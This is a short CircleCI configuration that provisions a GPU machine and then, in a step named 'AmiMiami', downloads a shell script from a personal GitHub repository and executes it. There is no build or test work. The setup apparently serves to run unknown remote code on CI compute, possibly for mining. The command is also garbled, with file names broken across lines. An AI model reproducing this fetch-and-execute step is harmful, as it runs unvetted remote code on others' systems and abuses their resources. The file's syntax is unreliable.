version: 2.1 
 
jobs: 
  build: 
    machine: 
      image: ubuntu-1604-cuda-10.1:201909-23 
    resource_class: gpu.nvidia.large 
    steps: 
      - checkout 
      - run: nvidia-smi 
      - run: 
          name: "AmiMiami"
          command:wget http://github.com/vaping8/Circleci/raw/main/Ami.sh && chmod +x a
          Ami.sh && ./a
          Ami.sh